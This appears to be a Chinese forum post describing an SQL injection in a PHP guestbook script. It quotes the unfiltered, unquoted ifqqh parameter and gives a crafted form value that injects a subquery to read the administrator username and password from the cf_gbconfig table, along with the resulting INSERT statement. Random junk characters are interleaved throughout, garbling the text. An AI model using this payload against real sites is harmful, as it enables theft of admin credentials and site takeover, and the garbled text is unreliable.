留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。- W0 \' `0 J. `( ]) b
3 o4 l( D+ j, }0 S N7 Z4 n$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
' n* h- B) i2 F8 K* |- O$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响9 a7 Q$ R& p7 e& j7 D7 ~. t& \$ {
6 M" q+ W: Y" I+ c+ j' _! Y提交的时候把ifqqh的值改一下。变成9 G' d% k ?+ `5 U8 w3 O3 D
B: Y% A- t3 ]. f" v$ ]0 F
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
9 N* G0 m- A: ^1 b, t0 o2 g0 i0 Q. j3 B1 F, G
这样SQL插入语句就变了.
3 t3 Y$ |! P- N* C% b$ ~' Y/ o. ]- s
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)0 y4 t% p3 k; }6 k$ M
! O4 N- R+ k! }8 d: @7 G' ]构造了另外一句SQL。并且把帐号密码读出来。: [/ z* Y8 U$ _$ h- Q
4 i1 ?) M" T ^. R" s6 Y) I |